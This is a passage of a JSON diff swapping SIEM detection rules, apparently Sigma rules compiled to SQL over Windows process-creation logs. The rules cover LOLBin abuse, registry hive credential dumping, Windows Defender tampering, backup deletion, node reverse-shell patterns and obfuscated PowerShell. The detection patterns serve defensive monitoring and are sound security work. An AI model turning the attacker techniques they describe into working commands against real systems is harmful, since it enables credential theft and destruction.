arbitrary download of files from a remote server.\n", + "author": "@gott_cyber", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1218", + "attack.t1105" ], "falsepositives": [ - "Legitimate use" + "Since the content of the files are unknown, false positives are expected" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pdqdeploy_execution.yml" + "filename": "proc_creation_win_ldifde_file_load.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Suspicious Execution of Shutdown to Log Out", - "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", "status": "experimental", - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "author": "frack113", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_logoff.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "status": "test", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Node Process Executions", - "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Use of Remote.exe", - "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", + "id": "01c42d3c-242d-4655-85b2-34f1739632f7", "status": "experimental", - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects usage of Dsacls to grant over permissive permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." + "Legitimate administrators granting over permissive permissions to users" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_remote.yml" + "filename": "proc_creation_win_dsacls_abuse_permissions.yml" }, { - "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", - "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + }, + { + "title": "WinDbg/CDB LOLBIN Usage", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "status": "test", + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" + ], + "falsepositives": [ + "Legitimate use of debugging tools" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_hotfix.yml" + "filename": "proc_creation_win_lolbin_cdb.yml" }, { - "title": "Using AppVLP To Circumvent ASR File Path Rule", - "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "status": "test", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], + "falsepositives": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + }, + { + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", "status": "experimental", - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "author": "Sreeman", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_appvlp.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "title": "UtilityFunctions.ps1 Proxy Dll", + "id": "0403d67d-6227-4ea8-8145-4e72db7da120", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1216" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_lolbin_utilityfunctions.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_node_abuse.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Tap Installer Execution", - "id": "99793437-3e16-439b-be0f-078782cf953d", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", + "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "status": "experimental", + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "@gott_cyber", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" ], - "filename": "proc_creation_win_tapinstall_execution.yml" + "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" }, { - "title": "Psr.exe Capture Screenshots", - "id": "2158f96f-43c2-43cb-952a-ab4580f32382", - "status": "test", - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE 